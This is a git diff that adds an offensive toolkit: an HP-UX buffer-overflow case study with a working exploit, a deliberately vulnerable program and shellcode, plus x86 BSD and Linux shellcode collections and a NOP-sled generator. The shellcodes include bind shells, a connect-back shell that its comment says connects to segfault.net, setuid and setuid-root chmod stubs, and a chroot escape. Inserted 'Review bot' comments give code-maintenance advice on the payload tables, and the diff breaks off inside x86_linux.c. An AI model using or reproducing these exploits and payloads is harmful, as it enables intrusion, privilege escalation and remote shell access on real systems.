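+all: sample-one shell-one shell-two shell-tree
+
+
+sample-one:
+ @cd sample-one && make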
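diff --git a/other/shellkit/tmp/hpux-tools/README b/other/shellkit/tmp/hpux-tools/README
new file mode 100644
index 0000000..b6ee0df
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/README
@@ -0,0 +1,10 @@
+This archive contains following files:
+Makefile - make file to build the stuff
+sample-one - example of exploit and vulnerable program
+shell-one.s - shellcode (v1)
+shell-tree.s - shellcode (v2)
+shell-two.s - shellcode (v3)
+
+
+--
+fygrave@tigerteam.net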
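diff --git a/other/shellkit/tmp/hpux-tools/sample-one/Makefile b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
new file mode 100644
index 0000000..aea8390
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
@@ -0,0 +1,10 @@
+all: exploit vuln
+
+exploit: exploit.c
+ gcc exploit.c -o exploit
+vuln: vuln.c
+ gcc vuln.c -o vuln
+
+
+clean:
+ @rm -f core *.core *.o vuln exploit a.out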
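diff --git a/other/shellkit/tmp/hpux-tools/sample-one/README b/other/shellkit/tmp/hpux-tools/sample-one/README
new file mode 100644
index 0000000..66be971
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/README
@@ -0,0 +1,5 @@
+These are examples for HP-UX buffer overflow case study. For more information
+please see http://www.notlsd.net/bof/
+
+--
+fygrave@tigerteam.net Tue Mar 20 15:41:48 ICT 2001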
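diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
new file mode 100644
index 0000000..11dc23c
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
@@ -0,0 +1,123 @@
+/*
+ * Sample exploit for HP-UX buffer overflows case study
+ */
+#include <stdio.h>
+#include <unistd.h>
+
+
+char shellcode[]=
+"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
+"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
+"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
+
+#define BUFFER_SIZE 180
+#define STACK_DSO -84
+#define NOP 0x0b390280
+#define PAD 0
+#define ALIGN 8
+#define ADB_PATH "/usr/bin/adb"
+#define VULNVAR "VULNBUF="
+#define MORE 1
+
+
+unsigned long get_sp(void)
+{
+ __asm__("copy %sp,%ret0 \n");
+}
+
+int main(int argc, char **argv) {
+int i, dso, align, padd, buf_size, adb, more;
+char *buf, *ptr;
+unsigned long retaddr;
+
+
+dso = STACK_DSO;
+align = ALIGN;
+padd = PAD;
+buf_size = BUFFER_SIZE;
+retaddr = 0;
+more = MORE;
+
+
+
+
+while ((i = getopt(argc, argv,
+ "Dd:b:r:o:a:p:m:")) != EOF) {
+ switch (i) {
+ case 'd':
+ dso=(int) strtol(optarg, NULL, 0);
+ break;
+ case 'm':
+ more+=(int) strtol(optarg, NULL, 0);
+ break;
+ case 'b':
+ buf_size=(int)strtol(optarg, NULL, 0);
+ break;
+ case 'r':
+ retaddr = strtoul(optarg, NULL, 0);
+ break;
+ case 'a':
+ align = (int) strtol(optarg, NULL, 0);
+ break;
+ case 'p':
+ padd = (int) strtol(optarg, NULL, 0);
+ break;
+ case 'D':
+ adb = 1;
+ break;
+ default:
+ fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
+ "[-r return_address]"
+ "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
+ exit(1);
+ break;
+ }
+}
+
+
+buf=(char *)calloc(strlen(VULNVAR) + buf_size
+ + sizeof(unsigned long)*more + 1, 1);
+ptr=buf;
+if (!buf) {
+ perror("calloc");
+ exit(1);
+}
+
+fprintf(stderr,"our stack %X\n",get_sp());
+if (!retaddr)
+ retaddr=get_sp()- dso + 3;
+fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
+ " buf_len: %i dso: %i more: %i\n",
+ retaddr, padd, align, buf_size, dso, more);
+
+strcpy(buf, VULNVAR);
+ptr+=strlen(VULNVAR);
+for(i=0;i<align; i++) *ptr++='A'; // fill in alignment
+
+for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
+ *ptr++=(NOP>>24)&0xff;
+ *ptr++=(NOP>>16)&0xff;
+ *ptr++=(NOP>>8)&0xff;
+ *ptr++=(NOP)&0xff;
+}
+
+strcat(buf, shellcode); // append shellcode
+ptr+=strlen(shellcode);
+
+for(i=0;i<padd; i++) *ptr++='B'; // padd
+
+for (i=0;i<more ; i++) {
+ *ptr++=(retaddr>>24)&0xff;
+ *ptr++=(retaddr>>16)&0xff;
+ *ptr++=(retaddr>>8)&0xff;
+ *ptr++=(retaddr)&0xff;
+}
+fprintf(stderr,"buflen is %i\n", strlen(buf));
+putenv(buf,1);
+if (adb)
+ execl(ADB_PATH,"adb","vuln", NULL);
+else
+ execl("./vuln","vuln",buf, NULL);
+perror("execl");
+return 0; // uff
+}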
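diff --git a/other/shellkit/tmp/hpux-tools/sample-one/vuln.c b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c
new file mode 100644
index 0000000..698af76
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c
@@ -0,0 +1,34 @@
+/*
+ * Sample vulnerable program for HP-UX buffer overflows case study
+ */
+#include <stdio.h>
+#include <stdlib.h>
+
+
+unsigned long get_sp(void)
+{
+ __asm__("copy %sp,%ret0 \n");
+}
+
+void baz(char *argument) {
+ char badbuf[200];
+
+ printf("badbuf ptr is: %p\n",badbuf);
+ strcpy(badbuf,argument);
+}
+
+void foo(char *arg) {
+
+ baz(arg);
+
+}
+
+int main(int argc, char **argv) {
+char *param;
+
+printf("vuln stack is: 0x%X\n",get_sp());
+param=getenv("VULNBUF");
+foo(param);
+
+return 0;
+}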
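diff --git a/other/shellkit/tmp/hpux-tools/shell-one.s b/other/shellkit/tmp/hpux-tools/shell-one.s
new file mode 100644
index 0000000..afbf9f8
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-one.s
@@ -0,0 +1,39 @@
+ .SPACE $TEXT$
+ .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+
+ .align 4
+ .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+
+ bl shellcode, %r1
+ nop
+ .SUBSPA $DATA$
+ .EXPORT shellcode; So we could see it in debugger
+shellcode
+ xor %r26, %r26, %r26; 0 - argv0
+ ldil L%0xc0000000,%r1; entry point
+ ble 0x4(%sr7,%r1) ;
+ ldi 23, %r22
+
+jump
+ bl .+8,%r1 ; address into %r1
+ nop
+ stb %r0, SHELL-jump+7-11(%sr0,%r1)
+
+ xor %r25, %r25, %r25; NULL ->arg1
+ ldi SHELL-jump-11, %r26;
+ add %r1, %r26, %r26;
+
+ ldil L%0xc0000000,%r1; entry point
+ ble 0x4(%sr7,%r1) ;
+ ldi 11, %r22;
+
+ xor %r26, %r26, %r26; return 0
+ ldil L%0xc0000000,%r1; entry point
+ ble 0x4(%sr7,%r1) ;
+ ldi 1, %r22 ; exit
+
+SHELL
+ .STRING "/bin/shA";
+
+endofshellcode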
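diff --git a/other/shellkit/tmp/hpux-tools/shell-tree.s b/other/shellkit/tmp/hpux-tools/shell-tree.s
new file mode 100644
index 0000000..c3044da
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-tree.s
@@ -0,0 +1,31 @@
+ .SPACE $TEXT$
+ .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+
+ .align 4
+ .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+
+ bl shellcode, %r1
+ nop
+ .SUBSPA $DATA$
+ .EXPORT shellcode; So we could see it in debugger
+shellcode
+
+ bl .+4,%r1 ; address into %r1
+ addi 500, %r1, %r3;
+ stb %r0, SHELL-shellcode+7-11-500(%sr0,%r3)
+
+ xor %r25, %r25, %r25; NULL ->arg1
+ ldi SHELL-shellcode-11-500, %r26;
+ add %r3, %r26, %r26;
+
+ ldil L%0xc0000000,%r1; entry point
+ ldi 500, %r22 ;
+ ble 0x4(%sr7,%r1) ;
+ subi 511, %r22, %r22 ;
+
+
+SHELL
+ .STRING "/bin/shA";
+
+endofshellcode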
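diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s
new file mode 100644
index 0000000..5dac10f
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-two.s
@@ -0,0 +1,41 @@
+ .SPACE $TEXT$
+ .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+
+ .align 4
+ .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+
+ bl shellcode, %r1
+ nop
+ .SUBSPA $DATA$
+ .EXPORT shellcode; So we could see it in debugger
+shellcode
+ xor %r26, %r26, %r26; 0 - argv0
+ ldil L%0xc0000000,%r1; entry point
+ ldi 500, %r22 ;
+ ble 0x4(%sr7,%r1) ;
+ subi 523, %r22, %r22 ; setuid(0)
+jump
+ bl .+4,%r1 ; address into %r1
+ addi 500, %r1, %r3;
+ stb %r0, SHELL-jump+7-11-500(%sr0,%r3)
+
+ xor %r25, %r25, %r25; NULL ->arg1
+ ldi SHELL-jump-11-500, %r26;
+ add %r3, %r26, %r26;
+
+ ldil L%0xc0000000,%r1; entry point
+ ldi 500, %r22 ;
+ ble 0x4(%sr7,%r1) ;
+ subi 511, %r22, %r22 ;
+
+ xor %r26, %r26, %r26; return 0
+ ldil L%0xc0000000,%r1; entry point
+ ldi 500, %r22 ;
+ ble 0x4(%sr7,%r1) ;
+ subi 501, %r22, %r22 ; exit
+
+SHELL
+ .STRING "/bin/shA";
+
+endofshellcode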
diff --git a/other/shellkit/tmp/hpux_bof.pdf b/other/shellkit/tmp/hpux_bof.pdf
new file mode 100644
index 0000000..6d2a957
--- /dev/null
+++ b/other/shellkit/tmp/hpux_bof.pdf
Binary files differ
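diff --git a/other/shellkit/x86.c b/other/shellkit/x86.c
new file mode 100644
index 0000000..dd580c6
--- /dev/null
+++ b/other/shellkit/x86.c
@@ -0,0 +1,124 @@
+/* x86.c - generic x86 functions
+ *
+ * by team teso
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "shellcode.h"
+#include "x86.h"
+
+
+static unsigned long int x86_nop_rwreg (void);
+static unsigned long int x86_nop_xfer (char *xferstr);
+
+
+static unsigned long int
+x86_nop_rwreg (void)
+{
+ unsigned long int reg;
+
+ do {
+ reg = random_get (0, 7);
+ } while (reg == 4); /* 4 = $esp */
+
+ return (reg);
+}
+
+
+static unsigned long int
+x86_nop_xfer (char *xferstr)
+{
+ int bw = 0; /* bitfield walker */
+ unsigned char tgt; /* resulting instruction */
+
+ /* in a valid xferstr we trust */
+ for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) {
+ switch (xferstr[0]) {
+ case ('0'):
+ BSET (tgt, 1, 0, bw);
+ break;
+ case ('1'):
+ BSET (tgt, 1, 1, bw);
+ break;
+ case ('r'):
+ BSET (tgt, 3, x86_nop_rwreg (), bw);
+ break;
+ case ('.'):
+ break; /* ignore */
+ default:
+ fprintf (stderr, "on steroids, huh?\n");
+ exit (EXIT_FAILURE);
+ break;
+ }
+ }
+
+ if (bw != 8) {
+ fprintf (stderr, "invalid bitwalker: bw = %d\n", bw);
+ exit (EXIT_FAILURE);
+ }
+
+ return (tgt);
+}
+
+
+unsigned int
+x86_nop (unsigned char *dest, unsigned int dest_len,
+ unsigned char *bad, int bad_len)
+{
+ int walk;
+ int bcount; /* bad counter */
+ char * xs;
+ char * xferstr[] = {
+ "0011.0111", /* aaa */
+ "0011.1111", /* aas */
+ "1001.1000", /* cbw */
+ "1001.1001", /* cdq */
+ "1111.1000", /* clc */
+ "1111.1100", /* cld */
+ "1111.0101", /* cmc */
+ "0010.0111", /* daa */
+ "0010.1111", /* das */
+ "0100.1r", /* dec <reg> */
+ "0100.0r", /* inc <reg> */
+ "1001.1111", /* lahf */
+ "1001.0000", /* nop */
+ "1111.1001", /* stc */
+ "1111.1101", /* std */
+ "1001.0r", /* xchg al, <reg> */
+ NULL,
+ };
+ unsigned char tgt;
+
+/*
+ * XXX: those nops are only one byte long. they could be used as byte values
+ * in opcodes like mov (add, sub, or, ...) as value. that would increase the
+ * randomness of the string. since the value is "nop save" we have no problem
+ * if the execution starts within this nop.
+ * now, having word sized nops, even larger nops are possible (again increasssing
+ * the randomness of the nop string).
+ * however, its a little complicated ;)
+ */
+
+ for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) {
+ /* avoid endless loops on excessive badlisting */
+ for (bcount = 0 ; bcount < 16384 ; ++bcount) {
+ xs = xferstr[random_get (0, 15)];
+ tgt = x86_nop_xfer (xs);
+
+ dest[walk] = tgt;
+ if (badstr (&dest[walk], 1, bad, bad_len) == 0)
+ break;
+ }
+
+ /* should not happen */
+ if (bcount >= 16384) {
+ fprintf (stderr, "too much blacklisting, giving up...\n");
+ exit (EXIT_FAILURE);
+ }
+ }
+
+ return (walk);
+}
+
+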
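Review bot: `random_get (0, 15)` on line 106 hard-codes the index range of `xferstr`, which has sixteen entries plus a NULL terminator, so adding or removing a pattern without also touching this call either reads the NULL slot (and x86_nop_xfer then returns 0 with `bw` still 0 and exits) or never emits the new entry; `sizeof (xferstr) / sizeof (xferstr[0]) - 2` derives the bound from the table itself, assuming random_get's upper bound is inclusive as the `0, 7` register use in x86_nop_rwreg suggests. sparc.c has the same coupling with `rand () % 12` against its twelve-entry `instr_format`, and additionally uses `rand ()` where this file uses `random_get`, so the two generators draw from different sources. The 16384 retry ceiling on lines 105 and 115 deserves a named constant such as `#define X86_NOP_MAX_RETRY 16384` rather than two literal copies that must be kept in step.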
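diff --git a/other/shellkit/x86.h b/other/shellkit/x86.h
new file mode 100644
index 0000000..f902a38
--- /dev/null
+++ b/other/shellkit/x86.h
@@ -0,0 +1,21 @@
+
+#ifndef X86_H
+#define X86_H
+
+#define x86_TERMINATOR "\x78\x56\x34\x12"
+
+
+/* x86_nop
+ *
+ * generate `dest_len' bytes of nopspace at `dest', which does not contain
+ * any of the characters in `bad', which is `bad_len' bytes long.
+ *
+ * return number of bytes generated
+ */
+
+unsigned int
+x86_nop (unsigned char *dest, unsigned int dest_len,
+ unsigned char *bad, int bad_len);
+
+#endif
+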
diff --git a/other/shellkit/x86.o b/other/shellkit/x86.o
new file mode 100644
index 0000000..5aa43d4
--- /dev/null
+++ b/other/shellkit/x86.o
Binary files differ
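diff --git a/other/shellkit/x86_bsd.c b/other/shellkit/x86_bsd.c
new file mode 100644
index 0000000..1946250
--- /dev/null
+++ b/other/shellkit/x86_bsd.c
@@ -0,0 +1,73 @@
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "shellcode.h"
+#include "x86.h"
+
+
+/* ATTENTION: this must be first of concated shellcodes and the last
+ one must be terminated with x86_TERMINATOR */
+shellcode x86_bsd_spset = {
+ "x86-bsd-spset",
+ 20,
+ "\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a"
+ "\x74\x06\x39\xc3\x74\xf3\xeb\xf4"
+};
+
+
+/* ATTENTION: connects to segfault.net at the moment */
+shellcode x86_bsd_connectsh = {
+ "x86-bsd-connectsh",
+ 66,
+ "\x31\xed\xf7\xe5\x55\x45\x55\x45\x55\xb0\x61\x55"
+ "\xcd\x80\x96\x68\xc3\x58\xb0\xca\x66\x68\x44\x44"
+ "\x66\x55\x89\xe7\x6a\x10\x57\x56\x56\x6a\x62\x58"
+ "\xcd\x80\x60\xb0\x5a\xcd\x80\x4d\x79\xf8\x52\x89"
+ "\xe3\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x60"
+ "\x5e\x5e\xb0\x3b\xcd\x80"
+};
+
+shellcode x86_bsd_portshellsh = {
+ "x86-bsd-portshellsh",
+ 73,
+ "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53"
+ "\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5"
+ "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a"
+ "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a"
+ "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73"
+ "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd"
+ "\x80"
+};
+
+shellcode x86_bsd_execvesh = {
+ "x86-bsd-execvesh",
+ 22,
+ "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68"
+ "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"
+};
+
+shellcode x86_bsd_exit = {
+ "x86-bsd-exit",
+ 5,
+ "\x31\xc0\x40\xcd\x80"
+};
+
+
+shellcode * x86_bsd_shellcodes[] = {
+ &x86_bsd_execvesh, /* TODO: add other shellcodes here */
+ &x86_bsd_exit,
+ &x86_bsd_portshellsh,
+ &x86_bsd_connectsh,
+ &x86_bsd_spset,
+ NULL,
+};
+
+arch x86_bsd = {
+ "x86-bsd",
+ 1,
+ x86_nop,
+ x86_bsd_shellcodes,
+};
+
+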
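Review bot: `x86_bsd_spset` on lines 11–16 carries exactly the same twenty bytes and the same ATTENTION comment as `x86_linux_spset` in x86_linux.c, and x86_bsd/spset.s is itself headed plain `x86 spset shellcode`; one definition kept next to `x86_TERMINATOR` in x86.c and referenced from both arch tables would stop the two copies drifting apart the next time the stub or its sentinel changes. The `/* TODO: add other shellcodes here */` on line 58 is stale now that four further entries follow it. The `x86_bsd_connectsh` ATTENTION comment on line 19 names a hard-wired destination baked into the bytes; a reference to the source lines in x86_bsd/connectsh.s that hold that address and port would let a maintainer audit what the byte string actually contains.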
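diff --git a/other/shellkit/x86_bsd.h b/other/shellkit/x86_bsd.h
new file mode 100644
index 0000000..8a7b1ba
--- /dev/null
+++ b/other/shellkit/x86_bsd.h
@@ -0,0 +1,12 @@
+
+#ifndef X86_BSD_H
+#define X86_BSD_H
+
+#include "x86.h"
+#include "shellcode.h"
+
+arch x86_bsd;
+
+
+#endif
+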
diff --git a/other/shellkit/x86_bsd.o b/other/shellkit/x86_bsd.o
new file mode 100644
index 0000000..0b42a2c
--- /dev/null
+++ b/other/shellkit/x86_bsd.o
Binary files differ
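diff --git a/other/shellkit/x86_bsd/FIXME_chmod.s b/other/shellkit/x86_bsd/FIXME_chmod.s
new file mode 100644
index 0000000..6f19d23
--- /dev/null
+++ b/other/shellkit/x86_bsd/FIXME_chmod.s
@@ -0,0 +1,43 @@
+/* x86/BSD PIC local chmod code
+ *
+ * by stealth
+ */
+
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ jmp boomsh
+
+foo: popl %ebx
+ incl (%ebx)
+ incl 4(%ebx)
+
+ xorl %eax, %eax
+ movb %al, 11(%ebx)
+
+ movb $16, %al /* chown */
+ xorl %ecx, %ecx
+ pushl %ecx
+ pushl %ecx
+ pushl %ebx
+ pushl $1
+sys_1: int $0x80
+
+ xorl %eax, %eax /* chmod */
+ movb $15, %al
+ pushw $06755
+ pushl %ebx
+ pushl $1
+sys_2: int $0x80
+
+ xorl %eax, %eax
+ incl %eax /* exit */
+ pushl $1
+sys_3: int $0x80
+
+boomsh: call foo
+ .string ".tmp.boomsh.";
+cend:
+
+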
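diff --git a/other/shellkit/x86_bsd/bindshell.s b/other/shellkit/x86_bsd/bindshell.s
new file mode 100644
index 0000000..8921fa9
--- /dev/null
+++ b/other/shellkit/x86_bsd/bindshell.s
@@ -0,0 +1,59 @@
+/* x86/BSD bindsh shellcode (73 bytes)
+
+ lorian / teso
+*/
+
+ .globl _cbegin
+ .globl cbegin
+ .globl _cend
+ .globl cend
+
+_cbegin:
+cbegin:
+ xorl %ebx, %ebx
+ mull %ebx
+ pushl %ebx
+ incl %ebx
+ pushl %ebx
+ incl %ebx
+ pushl %ebx
+ movb $0x61, %al
+ pushl %ebx
+ int $0x80
+ xchgl %esi, %eax
+ pushl %edx
+ pushw $0x4444
+ pushw %bx
+ movl %esp, %ebp
+ pushl $0x10
+ pushl %ebp
+ pushl %esi
+ pushl %esi
+ pushl $0x68
+ popl %eax
+ int $0x80
+ movb $0x6a, %al
+ int $0x80
+ pusha
+ movb $0x1e, %al
+ int $0x80
+a:
+ pushl %ebx
+ pushl %eax
+ pushl %eax
+ movb $0x5a, %al
+ int $0x80
+ decl %ebx
+ jns a
+ pushl %edx
+ movl %esp, %ebx
+ push $0x68732F6E
+ push $0x69622F2F
+ pusha
+ popl %esi
+ popl %esi
+ movb $0x3b, %al
+ int $0x80
+
+_cend:
+cend: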
diff --git a/other/shellkit/x86_bsd/connectsh b/other/shellkit/x86_bsd/connectsh
new file mode 100644
index 0000000..f9aaab7
--- /dev/null
+++ b/other/shellkit/x86_bsd/connectsh
Binary files differ
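diff --git a/other/shellkit/x86_bsd/connectsh.s b/other/shellkit/x86_bsd/connectsh.s
new file mode 100644
index 0000000..562f5ef
--- /dev/null
+++ b/other/shellkit/x86_bsd/connectsh.s
@@ -0,0 +1,51 @@
+/* x86/BSD connectsh shellcode (66 bytes)
+
+ lorian / teso
+*/
+
+ .globl _cbegin
+ .globl cbegin
+ .globl _cend
+ .globl cend
+
+_cbegin:
+cbegin:
+ xorl %ebp, %ebp
+ mull %ebp
+ pushl %ebp
+ incl %ebp
+ pushl %ebp
+ incl %ebp
+ pushl %ebp
+ movb $0x61, %al
+ pushl %ebp
+ int $0x80
+ xchgl %esi, %eax
+ pushl $0xcab058c3
+ pushw $0x4444
+ pushw %bp
+ movl %esp, %edi
+ pushl $0x10
+ pushl %edi
+ pushl %esi
+ pushl %esi
+ pushl $0x62
+ popl %eax
+ int $0x80
+a: pusha
+ movb $0x5a, %al
+ int $0x80
+ decl %ebp
+ jns a
+ pushl %edx
+ movl %esp, %ebx
+ push $0x68732F6E
+ push $0x69622F2F
+ pusha
+ popl %esi
+ popl %esi
+ movb $0x3b, %al
+ int $0x80
+
+_cend:
+cend: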
diff --git a/other/shellkit/x86_bsd/execvesh b/other/shellkit/x86_bsd/execvesh
new file mode 100644
index 0000000..7518768
--- /dev/null
+++ b/other/shellkit/x86_bsd/execvesh
Binary files differ
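diff --git a/other/shellkit/x86_bsd/execvesh.s b/other/shellkit/x86_bsd/execvesh.s
new file mode 100644
index 0000000..370e7a4
--- /dev/null
+++ b/other/shellkit/x86_bsd/execvesh.s
@@ -0,0 +1,31 @@
+/* x86/BSD execve /bin/sh shellcode
+ *
+ * lorian / teso
+ */
+
+/* somehow the obsd on plan9 where i tested it, needs the labels
+ * exported with _ before, while freebsd doesnt
+ */
+
+/* argv: OBSD needs a pointer to NULL, FBSD accepts NULL */
+
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+_cbegin:
+cbegin:
+ pushl $0x3b
+ popl %eax
+ cdq
+ pushl %edx
+ movl %esp, %ebx
+ push $0x68732F6E
+ push $0x69622F2F
+ pusha /* FULLPOWER */
+ pop %esi
+ pop %esi
+ int $0x80
+_cend:
+cend: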
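diff --git a/other/shellkit/x86_bsd/exit.s b/other/shellkit/x86_bsd/exit.s
new file mode 100644
index 0000000..7993035
--- /dev/null
+++ b/other/shellkit/x86_bsd/exit.s
@@ -0,0 +1,18 @@
+/* x86/BSD exit shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+_cbegin:
+cbegin:
+
+ xorl %eax, %eax
+ incl %eax
+ int $0x80
+
+_cend:
+cend: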
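diff --git a/other/shellkit/x86_bsd/spset.s b/other/shellkit/x86_bsd/spset.s
new file mode 100644
index 0000000..9bc19f4
--- /dev/null
+++ b/other/shellkit/x86_bsd/spset.s
@@ -0,0 +1,36 @@
+/* x86 spset shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+/* searches for 512 bytes "free" space on stack without destroying it
+ * like any kind of call would do...
+ *
+ * NOTE: your real shellcode must be terminated with
+ * \x78\x56\x34\x12 for this code to work...
+ */
+
+_cbegin:
+cbegin:
+
+ movl $0x12345678, %eax
+a:
+ cdq
+ movb $0x02, %dh
+b:
+ popl %ebx
+ pushl %ebx
+ incl %esp
+ decl %edx
+ jz c
+ cmpl %eax, %ebx
+ je a
+ jmp b
+c:
+
+_cend:
+cend: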
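diff --git a/other/shellkit/x86_linux.c b/other/shellkit/x86_linux.c
new file mode 100644
index 0000000..d8b6398
--- /dev/null
+++ b/other/shellkit/x86_linux.c
@@ -0,0 +1,352 @@
+/* FIXME: needs cleanup -sc
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <netinet/in.h>
+#include "shellcode.h"
+
+
+/* ATTENTION: this must be first of concated shellcodes and the last
+ one must be terminated with x86_TERMINATOR */
+shellcode x86_linux_spset = {
+ "x86-linux-spset",
+ 20,
+ "\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a"
+ "\x74\x06\x39\xc3\x74\xf3\xeb\xf4",
+};
+
+
+shellcode x86_linux_execvesh = {
+ "x86-linux-execvesh",
+ 23,
+ "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
+ "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80",
+};
+
+
+shellcode x86_linux_exit = {
+ "x86-linux-exit",
+ 5,
+ "\x31\xc0\x40\xcd\x80",
+};
+
+
+shellcode x86_linux_setgid = {
+ "x86-linux-setgid",
+ 14,
+ "\x6a\x2e\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42"
+ /* ^^ ^^ xor'ed with ^^ ^^ is the uid */
+ "\xcd\x80",
+};
+
+
+shellcode x86_linux_setuid = {
+ "x86-linux-setuid",
+ 14,
+ "\x6a\x17\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42"
+ /* ^^ ^^ xor'ed with ^^ ^^ is the uid */
+ "\xcd\x80",
+};
+
+
+shellcode x86_linux_setreuid = {
+ "x86-linux-setreuid",
+ 23,
+ "\x6a\x46\x58\x66\xbb\x41\x41\x66\x81\xf3\x41\x41"
+ /* ^^ ^^ ^^ ^^ */
+ "\x66\xb9\x42\x42\x66\x81\xf1\x42\x42\xcd\x80",
+ /* ^^ ^^ ^^ ^^ */
+};
+
+
+shellcode x86_linux_chmod = {
+ "x86-linux-chmod",
+ 22,
+ "\xeb\x0f\x31\xc0\x5b\x88\x43\x00"
+ /* ^^ file name length */
+ "\xb9\x41\x41\x41\x41\xb0\x0f\xcd\x80\xe8\xec\xff"
+ /* ^^ ^^ ^^ ^^ mode */
+ "\xff\xff",
+};
+
+
+shellcode x86_linux_chroot = {
+ "x86-linux-chroot",
+ 42,
+ "\x99\xb9\x50\x73\x50\x73\x50\x68\x41\x41\x2e\x2e"
+ "\x89\xe3\xb0\x27\xcd\x80\xb0\x3d\xcd\x80\x80\xc3"
+ "\x02\xfe\xc2\xb0\x0c\xcd\x80\x80\xfa\x6a\x75\xf5"
+ "\xfe\xc3\xb0\x3d\xcd\x80",
+};
+
+
+shellcode x86_linux_portshellsh = {
+ "x86-linux-portshellsh",
+ 94,
+ "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50"
+ "\x89\xe1\xb0\x66\xcd\x80\x52\x66\x68\x50\x73\x66"
+ /* ^^ ^^ */
+ "\x52\x89\xe2\x6a\x10\x52\x50\x89\xe1\xfe\xc3\x89"
+ "\xc2\xb0\x66\xcd\x80\x80\xc3\x02\xb0\x66\xcd\x80"
+ "\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3"
+ "\x31\xc9\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"
+ "\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
+ "\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80",
+};
+
+
+shellcode x86_linux_connectsh = {
+ "x86-linux-connectsh",
+ 88,
+ "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50"
+ "\x89\xe1\xb0\x66\xcd\x80\xb9\x41\x41\x41\x41\x81"
+ /* ^^ ^^ ^^ ^^ */
+ "\xf1\x3e\x41\x41\x40\x51\x66\x68\x50\x74\x66\x52"
+ /* ^^ ^^ ^^ ^^ ^^ ^^ */
+ "\x89\xe1\x89\xc2\x6a\x10\x51\x52\x89\xe1\xb3\x03"
+ "\xb0\x66\xcd\x80\x89\xd3\x31\xc9\xb0\x3f\xcd\x80"
+ "\xfe\xc1\xb0\x3f\xcd\x80\xb0\x0b\x99\x52\x68\x6e"
+ "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
+ "\x89\xe1\xcd\x80",
+};
+
+
+shellcode x86_linux_read = {
+ "x86-linux-read",
+ 16,
+ "\xeb\x0e\xb2\xfa\x59\x6a\x41\x5b\x80\xf3\x41\x6a"
+ "\x03\x58\xcd\x80",
+};
+
+
+shellcode *x86_linux_shellcodes[] = {
+ &x86_linux_chmod,
+ &x86_linux_chroot,
+ &x86_linux_connectsh,
+ &x86_linux_execvesh,
+ &x86_linux_exit,
+ &x86_linux_portshellsh,
+ &x86_linux_read,
+ &x86_linux_setgid,
+ &x86_linux_setuid,
+ &x86_linux_setreuid,
+ &x86_linux_spset,
+ NULL,
+};
+
+
+arch x86_linux = {
+ "x86-linux",
+ 1,
+ NULL, /* for nops use the same function as in arch bsd */
+ x86_linux_shellcodes
+};
+
+
+int
+isLegal (unsigned char x) /* XXX: Move this to a global position */
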